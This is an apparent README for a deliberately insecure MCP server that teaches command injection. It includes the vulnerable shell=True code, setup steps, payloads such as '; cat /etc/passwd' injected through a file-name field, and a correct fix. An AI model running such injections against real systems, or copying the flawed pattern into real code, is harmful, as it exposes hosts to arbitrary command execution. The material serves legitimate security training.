What is Vulnerable File Reader Server

Vulnerable-file-reader-server is a deliberately insecure MCP server designed to demonstrate command injection vulnerabilities. It showcases how improper input sanitization in file paths can lead to severe security risks, allowing attackers to execute arbitrary commands on the host system.

Use cases

Use cases include training security professionals on identifying and mitigating command injection vulnerabilities, demonstrating the importance of input sanitization, and providing a practical example for developers to learn secure coding techniques.

How to use

To use Vulnerable-file-reader-server, clone the repository, install the necessary MCP library, configure your Claude Desktop to point to the server, and then start the server in development mode. Follow the installation instructions provided in the README for detailed steps.

Key features

Key features include a demonstration of command injection vulnerabilities, educational insights into security flaws, and examples of proper security practices to mitigate such vulnerabilities.

Where to use

Vulnerable-file-reader-server is primarily used in educational environments, security training, and penetration testing scenarios to teach and understand command injection vulnerabilities and secure coding practices.

Command Injection Vulnerability in MCP File Reader

This repository demonstrates a critical command injection vulnerability in a Python MCP (Model Context Protocol) server implementation. The vulnerability allows attackers to execute arbitrary shell commands on the host system by manipulating the file path parameter.

The Vulnerability

The vulnerability exists in the read_file function which is intended to read files from a “safe” directory but contains a dangerous implementation flaw:

command = f"cat {file_name}"
result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)

This code is vulnerable because:

1. It uses shell=True which invokes a shell to execute the command
2. It directly interpolates user input (file_name) into the command string without proper sanitization
3. It performs only superficial validation on the input path

A simple semantic difference between using quotes around the filename ('file_name') and not using quotes (file_name) exposes the entire system to command execution.

Installation

Prerequisites

• Python 3.12 or higher
• MCP library version 1.6.0

Setup

1. Clone this repository:

   git clone https://github.com/Eliran79/Vulnerable-file-reader-server.git
   cd Vulnerable-file-reader-server
   

2. Install the MCP server:

   mcp install main.py
   

3. Configure Claude Desktop to use your MCP server by editing ~/.config/claude-desktop/claude_desktop_config.json:

   {
     "mcpServers": {
       "file-reader": {
         "command": "/ABSOLUTE/PATH/TO/uv",
         "args": [
           "--directory",
           "/data/git/file_reader_server",
           "/usr/bin/uv",
           "run,--with,mcp,mcp,run,main.py"
         ]
       }
     }
   }
   

   Be sure to replace /ABSOLUTE/PATH/TO/uv with the actual path to your uv executable and adjust the directory path if needed.

4. Start the MCP server in development mode:

   mcp dev main.py
   

Demonstration

1. In a separate terminal, install and run the MCP inspector:

   pip install mcp-inspector
   mcp-inspector
   

2. Connect to the server in the MCP Inspector GUI:

   • Set Transport Type to “STDIO”
   • Set Command to: run --with mcp run main.py
   • Click “Restart”

3. Exploit the vulnerability:

   • Go to the “Tools” tab
   • Find the “read_file” tool
   • In the “file_name” field, enter:

     /tmp/safe/test.txt; whoami
     

   • Click “Run Tool”

4. You should see the contents of test.txt followed by your username, demonstrating successful command execution.

Additional Exploitation Examples

Here are more command injection payloads to try:

/tmp/safe/test.txt; id
/tmp/safe/test.txt; ls -la /etc
/tmp/safe/test.txt; cat /etc/passwd
/tmp/safe/test.txt; echo $(hostname)
/tmp/safe/test.txt; find / -name "*.conf" 2>/dev/null | head -5

Proper Fix

To fix this vulnerability, never use shell=True with user-provided input. Instead:

# SECURE: Use a list of arguments instead of shell=True
result = subprocess.check_output(['cat', file_name], shell=False)

# OR, if shell=True is necessary, properly quote the argument:
import shlex
result = subprocess.check_output(f"cat {shlex.quote(file_name)}", shell=True)

# AND perform proper path validation:
import os
safe_dir_resolved = os.path.abspath(SAFE_DIRECTORY)
requested_path_resolved = os.path.abspath(file_name)
if not requested_path_resolved.startswith(safe_dir_resolved):
    return f"Error: Access denied. Path traversal attempt detected."

Warning

⚠️ FOR EDUCATIONAL PURPOSES ONLY: This implementation contains deliberate security vulnerabilities. Never use this code in a production environment or on any system that contains sensitive information.